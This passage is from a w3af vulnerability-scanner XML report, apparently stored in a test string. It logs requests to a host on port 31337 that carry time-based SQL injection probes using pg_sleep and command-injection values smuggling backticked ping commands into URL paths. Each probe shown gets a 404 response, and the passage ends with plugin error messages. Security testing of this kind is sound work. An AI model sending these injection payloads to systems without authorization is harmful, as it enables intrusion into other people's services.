                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="988">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1002">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1004">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1015">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1026">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3af-run>
"""
